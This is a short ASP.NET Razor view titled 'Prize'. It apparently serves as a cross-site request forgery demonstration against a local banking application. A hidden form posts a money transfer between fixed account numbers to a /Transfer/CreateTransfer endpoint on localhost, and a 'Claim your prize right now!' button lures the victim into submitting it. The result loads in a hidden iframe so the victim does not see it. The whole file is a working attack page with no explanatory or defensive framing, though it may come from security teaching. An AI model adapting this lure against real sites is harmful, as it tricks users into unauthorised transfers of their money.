@{
    ViewData["Title"] = "Prize";
}

<h1>Prize</h1>

<form method="post" action="https://localhost:5001/Transfer/CreateTransfer" target="HiddenIframe">
    <input type="hidden" name="DestinationClientEmail" value="goodguy@test.com"/>
    <input type="hidden" name="DestinationAccountNumber" value="1fbf06f6-4c6e-4fb8-ad74-d3467ca9b06d"/>
    <input type="hidden" name="SourceAccountNumber" value="51571793-ffd5-44f7-acf4-f17386ac1457"/>
    <input type="hidden" name="Currency" value="1"/>
    <input type="hidden" name="Amount" value="10"/>
    <input type="hidden" name="Details" value="Aaaaand it's gone! K, thx, bye!"/>
    <input type="submit" value="Claim your prize right now!"/>
</form>

<iframe name="HiddenIframe" hidden="hidden"></iframe>